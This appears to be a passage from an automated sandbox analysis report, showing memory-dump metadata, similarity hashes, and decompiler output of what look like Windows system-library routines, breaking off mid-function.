                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed61
                                                                                                                                                        0x0092ed66
                                                                                                                                                        0x0092ed6e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed7d
                                                                                                                                                        0x0092ed30
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed3c
                                                                                                                                                        0x0092ed43
                                                                                                                                                        0x0092ed4b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3965848254-0
                                                                                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction ID: 7839d0770ed58b7be5dc0245013052c5d3921c76c0faf561e5260a59cbb3be55
                                                                                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction Fuzzy Hash: 1D914931D0021EEBDF24DFA8C8456FEB7B4FF55314F24847AD651EA2A2E7305A818B91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                        			E0097E9FF(void* __edx, signed int _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                        				signed int _v5;
                                                                                                                                                        				int _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				char _v20;
                                                                                                                                                        				int _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				int _v32;
                                                                                                                                                        				signed int _v36;
                                                                                                                                                        				signed int _v40;
                                                                                                                                                        				signed int _v44;
                                                                                                                                                        				signed int _v48;
                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                        				char _v60;
                                                                                                                                                        				signed int _v64;
                                                                                                                                                        				char _v68;
                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                        				void _v96;
                                                                                                                                                        				char _v100;
                                                                                                                                                        				void _v140;
                                                                                                                                                        				char _v144;
                                                                                                                                                        				intOrPtr _v160;
                                                                                                                                                        				intOrPtr _v164;
                                                                                                                                                        				char _v172;
                                                                                                                                                        				char _v216;
                                                                                                                                                        				char _v220;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				void* _t231;
                                                                                                                                                        				signed char _t233;
                                                                                                                                                        				signed int _t237;
                                                                                                                                                        				signed int _t238;
                                                                                                                                                        				signed int _t244;
                                                                                                                                                        				short _t251;
                                                                                                                                                        				signed int _t253;
                                                                                                                                                        				signed int* _t254;
                                                                                                                                                        				signed int _t255;
                                                                                                                                                        				signed int _t257;
                                                                                                                                                        				signed int _t259;
                                                                                                                                                        				signed int _t260;
                                                                                                                                                        				signed int _t267;
                                                                                                                                                        				signed int _t271;
                                                                                                                                                        				intOrPtr _t281;
                                                                                                                                                        				signed int _t314;
                                                                                                                                                        				signed char _t316;
                                                                                                                                                        				signed int _t319;
                                                                                                                                                        				signed int _t322;
                                                                                                                                                        				signed int _t323;
                                                                                                                                                        				signed int _t326;
                                                                                                                                                        				signed int _t328;
                                                                                                                                                        				signed int _t330;
                                                                                                                                                        				signed int _t332;
                                                                                                                                                        				signed int _t334;
                                                                                                                                                        				int _t340;
                                                                                                                                                        				intOrPtr* _t341;
                                                                                                                                                        				signed int _t342;
                                                                                                                                                        				signed int _t343;
				signed int _t345;
				signed int _t347;
				signed int _t352;
				void* _t360;
				intOrPtr* _t370;
				intOrPtr _t371;
				intOrPtr* _t372;

				_t360 = __edx;
				_t340 = 0;
				_t345 = 0xa;
				_v144 = 0;
				memset( &_v140, 0, _t345 << 2);
				_v20 = 0;
				_v220 = 0;
				E008CDFC0( &_v216, 0, 0x2c);
				_t371 = _a8;
				_t347 = 7;
				_v100 = 0;
				_t231 = memset( &_v96, 0, _t347 << 2);
				_t348 = 0;
				_v12 = 0;
				_v32 = 0;
				_v24 = 0;
				_v5 = _t231;
				if(_t371 != 0) {
					_v5 = 1;
				}
				_t370 = _a4;
				_t233 =  *(_t370 + 0xcc) >> 3;
				_t380 = _t233 & 0x00000001;
				if((_t233 & 0x00000001) != 0) {
					E0097E919(_t360, _t380, _t370 + 0x70, _t370 + 0x78, _t370 + 0x68);
				}
				_v52 =  *((intOrPtr*)(_t370 + 0x6c));
				_v16 =  *(_t370 + 0x80);
				if(_v5 != _t340) {
					_t42 = _t371 + 0x20; // 0x97c2d6
					_v32 = _t42;
					_t44 = _t371 + 4; // 0x5bcd335e
					_t237 =  *_t44 & 0x0000ffff;
					_v24 = _t237;
					_t238 = _t237 + 0x48;
					__eflags = _t238;
					L12:
					_v28 = _t238;
					_t372 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _v16);
					if(_t372 != _t340) {
						_t54 = _t372 + 0x48; // 0x48
						_t341 = _t54;
						_t244 = E0097E519(_t360, _v52, 0xc0000000, 1,  &_a12, 0x20000080,  &_v12);
						__eflags = _t244;
						_a4 = _t244;
						if(_t244 < 0) {
							L49:
							__eflags = _v12;
							if(_v12 != 0) {
								E008BF9F0(_v12);
							}
							L51:
							_t340 = 0;
							__eflags = 0;
							L52:
							if(_t372 != _t340) {
								E008CE025(_t348,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t340, _t372);
							}
							L54:
							return _a4;
						}
						__eflags = _a12 - 1;
						if(_a12 != 1) {
							 *_t372 = _v16;
							_t251 = 4;
							 *((short*)(_t372 + 0x36)) = _t251;
							 *((short*)(_t372 + 0x34)) = 1;
							_t253 = _v28;
							 *((char*)(_t372 + 0x29)) = 8;
							 *(_t372 + 0x30) = _t253;
							__eflags = _v5;
							if(_v5 != 0) {
								_t254 = _v32;
								_t254[8] =  *(_t370 + 0xcc) & 0x00101000 | 0x00010001;
								_t254[9] = 1;
								 *_t254 =  *(_t370 + 0x80);
								 *((char*)(_t372 + 0x6e)) = 1;
								 *((char*)(_t372 + 0x6f)) = 5;
								__eflags = _t254[0xb] - 8;
								if(_t254[0xb] != 8) {
									_t187 =  &(_t254[0x42]); // 0xf938e834
									_t255 =  *_t187;
								} else {
									_t186 =  &(_t254[0x44]); // 0x14538910
									_t255 =  *_t186;
								}
								 *(_t370 + 0x10) = _t255;
								E008C2340(_t341, _a8, _v24);
								L39:
								_t257 =  *(_t372 + 0x30);
								_t342 = _v16;
								__eflags = _t257 - _t342;
								if(_t257 < _t342) {
									__eflags = _t257 - 0x48;
									if(_t257 > 0x48) {
										__eflags = _t257 + _t372;
										E008CDFC0(_t257 + _t372, 0xff, _t342 - _t257);
									}
								}
								_push(0);
								_push(0);
								_push(_t342);
								_push(_t372);
								_t348 =  &_v60;
								_push( &_v60);
								_push(0);
								_push(0);
								_push(0);
								_t259 = E008BF938(_v12);
								_a4 = _t259;
								__eflags = _t259;
								if(_t259 < 0) {
									goto L49;
								} else {
									_t260 =  *(_t370 + 0xc8);
									__eflags = _t260;
									if(_t260 == 0) {
										L48:
										_t348 = _v12;
										 *(_t370 + 0x100) = 1;
										 *(_t370 + 0xd8) = 1;
										__eflags = 0;
										 *(_t370 + 0xf0) = _t342;
										 *(_t370 + 0xf4) = 0;
										 *(_t370 + 0xe8) = _t342;
										 *(_t370 + 0xec) = 0;
										 *(_t370 + 0x5c) = _v12;
										_v12 = 0;
										goto L49;
									}
									_t352 =  *(_t370 + 0xcc);
									__eflags = _t352 & 0x00000020;
									if((_t352 & 0x00000020) == 0) {
										goto L48;
									}
									__eflags = _t352 & 0x00002000;
									_t348 = 0x400;
									if((_t352 & 0x00002000) == 0) {
										_t348 = 0x100000;
									}
									_push(0x14);
									_v40 = _t260 * _t348;
									_push(8);
									_push( &_v40);
									_push( &_v60);
									_v36 = _t260 * _t348 >> 0x20;
									_t267 = E008BFC48(_v12);
									_a4 = _t267;
									__eflags = _t267;
									if(_t267 < 0) {
										goto L49;
									} else {
										goto L48;
									}
								}
							}
							 *((intOrPtr*)(_t341 + 4)) = _t253 + 0xffffffb8;
							 *_t341 = 0xc0010000;
							_t271 =  *(_t370 + 0x10);
							__eflags = _t271 - 2;
							if(_t271 != 2) {
								__eflags = _t271 - 3;
								if(_t271 != 3) {
									_v48 = 0;
									_v44 = 0;
									E008D2954(1, _t372,  &_v48);
									 *(_t341 + 0x10) = _v48;
									 *((intOrPtr*)(_t341 + 0x14)) = _v44;
									L34:
									 *((intOrPtr*)(_t341 + 0xc)) = _v164;
									 *((intOrPtr*)(_t341 + 8)) = _v160;
									 *((intOrPtr*)(_t341 + 0x18)) = E00904FC0(_v84, _v80, _v140, 0);
									 *((intOrPtr*)(_t341 + 0x1c)) = E00904FC0(_v76, _v72, _v140, 0);
									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									 *((char*)(_t372 + 0x6c)) =  *((intOrPtr*)(_t281 + 0xa4));
									 *((char*)(_t372 + 0x6d)) =  *((intOrPtr*)(_t281 + 0xa8));
									 *((char*)(_t372 + 0x6e)) = 1;
									 *((char*)(_t372 + 0x6f)) = 5;
									 *(_t372 + 0x70) =  *(_t281 + 0xac) & 0x0000ffff;
									 *(_t372 + 0x170) =  *(_t370 + 0x10);
									 *(_t372 + 0x74) =  *(_t370 + 0x7c);
									 *((intOrPtr*)(_t372 + 0x90)) = 1;
									 *(_t372 + 0x8c) = 1;
									 *((intOrPtr*)(_t372 + 0x94)) = 4;
									 *((intOrPtr*)(_t372 + 0x68)) = _v16;
									 *(_t372 + 0x84) =  *(_t370 + 0xc8);
									 *(_t372 + 0x88) =  *(_t370 + 0xcc);
									 *((intOrPtr*)(_t372 + 0x80)) = _v140;
									 *((intOrPtr*)(_t372 + 0x158)) = _v220;
									 *(_t372 + 0xa0) =  *(_t372 + 0xa0) & 0x00000000;
									 *(_t372 + 0xa4) =  *(_t372 + 0xa4) & 0x00000000;
									 *((intOrPtr*)(_t372 + 0x15c)) = _v216;
									 *((intOrPtr*)(_t372 + 0x9c)) = _v20;
                                                                                                                                                        									_t163 = _t372 + 0x178; // 0x178
                                                                                                                                                        									E008C2340(_t163,  *((intOrPtr*)(_t370 + 0x64)), ( *(_t370 + 0x60) & 0x0000ffff) + 2);
                                                                                                                                                        									E008C2340(( *(_t370 + 0x60) & 0x0000ffff) + _t372 + 0x17a,  *((intOrPtr*)(_t370 + 0x6c)), ( *(_t370 + 0x68) & 0x0000ffff) + 2);
                                                                                                                                                        									_t169 = _t372 + 0xa8; // 0xa8
                                                                                                                                                        									E0097E649(0, _t370, _t372, _t169);
                                                                                                                                                        									_t170 = _t372 + 0x160; // 0x160
                                                                                                                                                        									E008DB2FA(_v16, 0, _t170);
                                                                                                                                                        									 *((intOrPtr*)(_t372 + 0x168)) =  *_t370;
                                                                                                                                                        									 *((intOrPtr*)(_t372 + 0x16c)) =  *((intOrPtr*)(_t370 + 4));
                                                                                                                                                        									 *(_t341 + 0x10) =  *(_t370 + 8);
                                                                                                                                                        									 *((intOrPtr*)(_t341 + 0x14)) =  *((intOrPtr*)(_t370 + 0xc));
                                                                                                                                                        									goto L39;
                                                                                                                                                        								}
                                                                                                                                                        								asm("rdtsc");
                                                                                                                                                        								L32:
                                                                                                                                                        								 *(_t341 + 0x10) = _t271;
                                                                                                                                                        								 *((intOrPtr*)(_t341 + 0x14)) = 0;
                                                                                                                                                        								goto L34;
                                                                                                                                                        							}
                                                                                                                                                        							_t271 = E0097BCFC();
                                                                                                                                                        							goto L32;
                                                                                                                                                        						}
                                                                                                                                                        						_push(0);
                                                                                                                                                        						_push( &_v68);
                                                                                                                                                        						_push(_v16);
                                                                                                                                                        						_push(_t372);
                                                                                                                                                        						_push( &_v60);
                                                                                                                                                        						_push(0);
                                                                                                                                                        						_push(0);
                                                                                                                                                        						_push(0);
                                                                                                                                                        						_v68 = 0;
                                                                                                                                                        						_v64 = 0;
                                                                                                                                                        						_t314 = E008BF900(_v12);
                                                                                                                                                        						_a4 = _t314;
                                                                                                                                                        						__eflags = _t314;
                                                                                                                                                        						if(_t314 < 0) {
                                                                                                                                                        							goto L49;
                                                                                                                                                        						}
                                                                                                                                                        						_t316 =  *(_t372 + 0x88) >> 1;
                                                                                                                                                        						__eflags = _t316 & 0x00000001;
                                                                                                                                                        						if((_t316 & 0x00000001) == 0) {
                                                                                                                                                        							__eflags =  *((intOrPtr*)(_t372 + 0x6c)) -  *0x7ffe026c;
                                                                                                                                                        							if( *((intOrPtr*)(_t372 + 0x6c)) !=  *0x7ffe026c) {
                                                                                                                                                        								goto L18;
                                                                                                                                                        							}
                                                                                                                                                        							__eflags =  *((intOrPtr*)(_t372 + 0x6d)) -  *0x7ffe0270;
                                                                                                                                                        							if( *((intOrPtr*)(_t372 + 0x6d)) !=  *0x7ffe0270) {
                                                                                                                                                        								goto L18;
                                                                                                                                                        							}
                                                                                                                                                        							__eflags =  *((intOrPtr*)(_t372 + 0x94)) - 4;
                                                                                                                                                        							if( *((intOrPtr*)(_t372 + 0x94)) != 4) {
                                                                                                                                                        								goto L18;
                                                                                                                                                        							}
                                                                                                                                                        							_t319 =  *((intOrPtr*)(_t372 + 0x68));
                                                                                                                                                        							_t343 =  *(_t372 + 0x8c);
                                                                                                                                                        							_v16 = _t319;
                                                                                                                                                        							__eflags = _t319 + 0xfffffc00 - 0xffc00;
                                                                                                                                                        							if(_t319 + 0xfffffc00 > 0xffc00) {
                                                                                                                                                        								goto L18;
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t343;
                                                                                                                                                        							if(_t343 == 0) {
                                                                                                                                                        								goto L18;
                                                                                                                                                        							}
                                                                                                                                                        							_t348 =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
                                                                                                                                                        							__eflags =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
                                                                                                                                                        							if(( *(_t372 + 0x78) |  *(_t372 + 0x7c)) == 0) {
                                                                                                                                                        								goto L18;
                                                                                                                                                        							}
                                                                                                                                                        							_t348 =  *(_t372 + 0x74);
                                                                                                                                                        							__eflags =  *(_t372 + 0x74) -  *(_t370 + 0x7c);
                                                                                                                                                        							if( *(_t372 + 0x74) !=  *(_t370 + 0x7c)) {
                                                                                                                                                        								goto L18;
                                                                                                                                                        							}
                                                                                                                                                        							_push(0);
                                                                                                                                                        							_push( &_v68);
                                                                                                                                                        							 *(_t372 + 0x78) = 0;
                                                                                                                                                        							 *(_t372 + 0x7c) = 0;
                                                                                                                                                        							_push( *(_t370 + 0x80));
                                                                                                                                                        							_t348 =  &_v60;
                                                                                                                                                        							_push(_t372);
                                                                                                                                                        							_push( &_v60);
                                                                                                                                                        							_push(0);
                                                                                                                                                        							_push(0);
                                                                                                                                                        							_push(0);
                                                                                                                                                        							_t322 = E008BF938(_v12);
                                                                                                                                                        							 *(_t370 + 0xec) =  *(_t370 + 0xec) & 0x00000000;
                                                                                                                                                        							_a4 = _t322;
                                                                                                                                                        							_t323 = _v16;
                                                                                                                                                        							 *(_t370 + 0x100) = _t343;
                                                                                                                                                        							 *(_t370 + 0xd8) = _t343;
                                                                                                                                                        							 *(_t370 + 0xf4) =  *(_t370 + 0xf4) & 0x00000000;
                                                                                                                                                        							 *(_t370 + 0x80) = _t323;
                                                                                                                                                        							 *(_t370 + 0xe8) = _t323;
                                                                                                                                                        							 *(_t370 + 0xf0) = _t343 * _t323;
                                                                                                                                                        							 *(_t370 + 0x5c) = _v12;
                                                                                                                                                        							goto L51;
                                                                                                                                                        						}
                                                                                                                                                        						L18:
                                                                                                                                                        						_a4 = 0xc000000d;
                                                                                                                                                        						goto L49;
                                                                                                                                                        					}
                                                                                                                                                        					_a4 = 0xc0000017;
                                                                                                                                                        					goto L52;
                                                                                                                                                        				}
                                                                                                                                                        				_push(_t340);
                                                                                                                                                        				_push(0x2c);
                                                                                                                                                        				_push( &_v144);
                                                                                                                                                        				_t326 = E008BFDC0(_t340);
                                                                                                                                                        				_a4 = _t326;
                                                                                                                                                        				if(_t326 < _t340) {
                                                                                                                                                        					goto L54;
                                                                                                                                                        				}
                                                                                                                                                        				_push(_t340);
                                                                                                                                                        				_push(0x1c);
                                                                                                                                                        				_push( &_v172);
                                                                                                                                                        				_push(_t340);
                                                                                                                                                        				_t328 = E008BFC18(0xfffffffe);
                                                                                                                                                        				_a4 = _t328;
                                                                                                                                                        				if(_t328 < _t340) {
                                                                                                                                                        					goto L54;
                                                                                                                                                        				}
                                                                                                                                                        				_push(_t340);
                                                                                                                                                        				_push(0x20);
                                                                                                                                                        				_push( &_v100);
                                                                                                                                                        				_push(1);
                                                                                                                                                        				_t330 = E008BFC18(0xfffffffe);
                                                                                                                                                        				_a4 = _t330;
                                                                                                                                                        				if(_t330 < _t340) {
                                                                                                                                                        					goto L54;
                                                                                                                                                        				}
                                                                                                                                                        				_push(_t340);
                                                                                                                                                        				_push(0x30);
                                                                                                                                                        				_push( &_v220);
                                                                                                                                                        				_t332 = E008BFDC0(3);
                                                                                                                                                        				_a4 = _t332;
                                                                                                                                                        				if(_t332 < _t340) {
                                                                                                                                                        					goto L54;
                                                                                                                                                        				}
                                                                                                                                                        				_t334 = E00918001(_t348, _t360, _t370, _t340,  &_v20);
                                                                                                                                                        				_a4 = _t334;
                                                                                                                                                        				if(_t334 < _t340) {
                                                                                                                                                        					goto L54;
                                                                                                                                                        				}
                                                                                                                                                        				_t348 =  *(_t370 + 0x60) & 0x0000ffff;
                                                                                                                                                        				_t238 = ( *(_t370 + 0x68) & 0x0000ffff) + ( *(_t370 + 0x60) & 0x0000ffff) + 0x17c;
                                                                                                                                                        				goto L12;
                                                                                                                                                        			}





































































                                                                                                                                                        0x0097eb39
                                                                                                                                                        0x0097eb3c
                                                                                                                                                        0x0097eb3c
                                                                                                                                                        0x0097eb3f
                                                                                                                                                        0x0097eb42
                                                                                                                                                        0x0097eb58
                                                                                                                                                        0x0097eb5c
                                                                                                                                                        0x0097eb81
                                                                                                                                                        0x0097eb81
                                                                                                                                                        0x0097eb84
                                                                                                                                                        0x0097eb8b
                                                                                                                                                        0x0097eb8d
                                                                                                                                                        0x0097eb90
                                                                                                                                                        0x0097ef60
                                                                                                                                                        0x0097ef60
                                                                                                                                                        0x0097ef64
                                                                                                                                                        0x0097ef69
                                                                                                                                                        0x0097ef69
                                                                                                                                                        0x0097ef6e
                                                                                                                                                        0x0097ef6e
                                                                                                                                                        0x0097ef6e
                                                                                                                                                        0x0097ef70
                                                                                                                                                        0x0097ef72
                                                                                                                                                        0x0097ef82
                                                                                                                                                        0x0097ef82
                                                                                                                                                        0x0097ef87
                                                                                                                                                        0x0097ef8e
                                                                                                                                                        0x0097ef8e
                                                                                                                                                        0x0097eb96
                                                                                                                                                        0x0097eb9a
                                                                                                                                                        0x0097ec92
                                                                                                                                                        0x0097ec98
                                                                                                                                                        0x0097ec9a
                                                                                                                                                        0x0097eca0
                                                                                                                                                        0x0097eca4
                                                                                                                                                        0x0097eca7
                                                                                                                                                        0x0097ecab
                                                                                                                                                        0x0097ecae
                                                                                                                                                        0x0097ecb1
                                                                                                                                                        0x0097ee59
                                                                                                                                                        0x0097ee68
                                                                                                                                                        0x0097ee6b
                                                                                                                                                        0x0097ee74
                                                                                                                                                        0x0097ee76
                                                                                                                                                        0x0097ee7a
                                                                                                                                                        0x0097ee7e
                                                                                                                                                        0x0097ee82
                                                                                                                                                        0x0097ee8c
                                                                                                                                                        0x0097ee8c
                                                                                                                                                        0x0097ee84
                                                                                                                                                        0x0097ee84
                                                                                                                                                        0x0097ee84
                                                                                                                                                        0x0097ee84
                                                                                                                                                        0x0097ee95
                                                                                                                                                        0x0097ee9c
                                                                                                                                                        0x0097eea4
                                                                                                                                                        0x0097eea4
                                                                                                                                                        0x0097eea7
                                                                                                                                                        0x0097eeaa
                                                                                                                                                        0x0097eeac
                                                                                                                                                        0x0097eeae
                                                                                                                                                        0x0097eeb1
                                                                                                                                                        0x0097eeb8
                                                                                                                                                        0x0097eec0
                                                                                                                                                        0x0097eec5
                                                                                                                                                        0x0097eeb1
                                                                                                                                                        0x0097eeca
                                                                                                                                                        0x0097eecb
                                                                                                                                                        0x0097eecc
                                                                                                                                                        0x0097eecd
                                                                                                                                                        0x0097eece
                                                                                                                                                        0x0097eed1
                                                                                                                                                        0x0097eed2
                                                                                                                                                        0x0097eed3
                                                                                                                                                        0x0097eed4
                                                                                                                                                        0x0097eed8
                                                                                                                                                        0x0097eedd
                                                                                                                                                        0x0097eee0
                                                                                                                                                        0x0097eee2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097eee4
                                                                                                                                                        0x0097eee4
                                                                                                                                                        0x0097eeea
                                                                                                                                                        0x0097eeec
                                                                                                                                                        0x0097ef2e
                                                                                                                                                        0x0097ef2e
                                                                                                                                                        0x0097ef34
                                                                                                                                                        0x0097ef3a
                                                                                                                                                        0x0097ef40
                                                                                                                                                        0x0097ef42
                                                                                                                                                        0x0097ef48
                                                                                                                                                        0x0097ef4e
                                                                                                                                                        0x0097ef54
                                                                                                                                                        0x0097ef5a
                                                                                                                                                        0x0097ef5d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ef5d
                                                                                                                                                        0x0097eeee
                                                                                                                                                        0x0097eef4
                                                                                                                                                        0x0097eef7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097eef9
                                                                                                                                                        0x0097eeff
                                                                                                                                                        0x0097ef04
                                                                                                                                                        0x0097ef06
                                                                                                                                                        0x0097ef06
                                                                                                                                                        0x0097ef0d
                                                                                                                                                        0x0097ef0f
                                                                                                                                                        0x0097ef12
                                                                                                                                                        0x0097ef17
                                                                                                                                                        0x0097ef1b
                                                                                                                                                        0x0097ef1f
                                                                                                                                                        0x0097ef22
                                                                                                                                                        0x0097ef27
                                                                                                                                                        0x0097ef2a
                                                                                                                                                        0x0097ef2c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0097ef2c
                                                                                                                                                        0x0097eee2
                                                                                                                                                        0x0097ecba
                                                                                                                                                        0x0097ecbd
                                                                                                                                                        0x0097ecc3
                                                                                                                                                        0x0097ecc6
                                                                                                                                                        0x0097ecc9
                                                                                                                                                        0x0097ecd2
                                                                                                                                                        0x0097ecd5
                                                                                                                                                        0x0097ece5
                                                                                                                                                        0x0097ece8
                                                                                                                                                        0x0097eceb
                                                                                                                                                        0x0097ecf3
                                                                                                                                                        0x0097ecf9
                                                                                                                                                        0x0097ecfc
                                                                                                                                                        0x0097ed02
                                                                                                                                                        0x0097ed0d
                                                                                                                                                        0x0097ed23
                                                                                                                                                        0x0097ed37
                                                                                                                                                        0x0097ed40
                                                                                                                                                        0x0097ed49
                                                                                                                                                        0x0097ed52
                                                                                                                                                        0x0097ed58
                                                                                                                                                        0x0097ed5c
                                                                                                                                                        0x0097ed67
                                                                                                                                                        0x0097ed6d
                                                                                                                                                        0x0097ed76
                                                                                                                                                        0x0097ed7c
                                                                                                                                                        0x0097ed82
                                                                                                                                                        0x0097ed88
                                                                                                                                                        0x0097ed92
                                                                                                                                                        0x0097ed9b
                                                                                                                                                        0x0097eda7
                                                                                                                                                        0x0097edb3
                                                                                                                                                        0x0097edbf
                                                                                                                                                        0x0097edcb
                                                                                                                                                        0x0097edd2
                                                                                                                                                        0x0097edd9
                                                                                                                                                        0x0097ede2
                                                                                                                                                        0x0097edf2
                                                                                                                                                        0x0097edf9
                                                                                                                                                        0x0097ee14
                                                                                                                                                        0x0097ee1c
                                                                                                                                                        0x0097ee23
                                                                                                                                                        0x0097ee28
                                                                                                                                                        0x0097ee2f
                                                                                                                                                        0x0097ee36
                                                                                                                                                        0x0097ee3f
                                                                                                                                                        0x0097ee48
                                                                                                                                                        0x0097ee4e

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097ED1C
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097ED32
                                                                                                                                                          • Part of subcall function 008BF900: LdrInitializeThunk.NTDLL ref: 008BF90E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                        • String ID: 409
                                                                                                                                                        • API String ID: 1404860816-1549806245
                                                                                                                                                        • Opcode ID: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                        • Instruction ID: 78af8deb9bae679c54e7c357312de7fdb44756244be3543d62a9654558662c6d
                                                                                                                                                        • Opcode Fuzzy Hash: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                        • Instruction Fuzzy Hash: 4B022DB1900749EFDB55DF69C880BEABBF8FF08300F0085AAE999D7651D734A954CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                        			E00975CFA(void* __edx, void* __edi, signed int __esi, signed int _a4, signed int _a8, signed char _a12, signed int _a16) {
                                                                                                                                                        				signed int _v5;
                                                                                                                                                        				signed int _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				signed char _v24;
                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                        				signed int _v32;
                                                                                                                                                        				signed char _v36;
                                                                                                                                                        				signed char _v40;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				intOrPtr* _t117;
                                                                                                                                                        				signed int _t118;
                                                                                                                                                        				void* _t119;
                                                                                                                                                        				intOrPtr _t121;
                                                                                                                                                        				void* _t122;
                                                                                                                                                        				void* _t123;
                                                                                                                                                        				signed int _t124;
                                                                                                                                                        				signed int _t125;
                                                                                                                                                        				signed int _t129;
                                                                                                                                                        				signed int _t133;
                                                                                                                                                        				signed int _t135;
                                                                                                                                                        				void* _t141;
                                                                                                                                                        				void* _t143;
                                                                                                                                                        				signed char _t144;
                                                                                                                                                        				signed int _t145;
                                                                                                                                                        				signed int _t148;
                                                                                                                                                        				signed int _t149;
                                                                                                                                                        				intOrPtr* _t151;
                                                                                                                                                        				signed char _t153;
                                                                                                                                                        				signed int _t160;
                                                                                                                                                        				void* _t162;
                                                                                                                                                        				signed char _t163;
                                                                                                                                                        				void* _t167;
                                                                                                                                                        				signed int _t168;
                                                                                                                                                        				intOrPtr* _t171;
                                                                                                                                                        				signed int _t172;
                                                                                                                                                        				signed int _t173;
                                                                                                                                                        				signed int _t174;
                                                                                                                                                        				void* _t176;
                                                                                                                                                        
                                                                                                                                                        				_t173 = __esi;
                                                                                                                                                        				_t167 = __edi;
                                                                                                                                                        				_t162 = __edx;
                                                                                                                                                        				_t151 = _a8;
                                                                                                                                                        				_t117 = _a4;
                                                                                                                                                        				_t148 = 0;
                                                                                                                                                        				if(_t151 != 0) {
                                                                                                                                                        					 *_t151 = _t117;
                                                                                                                                                        				}
                                                                                                                                                        				if(_t117 != _t148) {
                                                                                                                                                        					__eflags = _a12 - _t148;
                                                                                                                                                        					if(_a12 == _t148) {
                                                                                                                                                        						L7:
                                                                                                                                                        						_push(_t173);
                                                                                                                                                        						_push(_t167);
                                                                                                                                                        						_v20 = _t148;
                                                                                                                                                        						_v16 = _t148;
                                                                                                                                                        						_v5 =  *_t117;
                                                                                                                                                        						_t9 = _t117 + 1; // 0x1
                                                                                                                                                        						_t168 = _t9;
                                                                                                                                                        						while(1) {
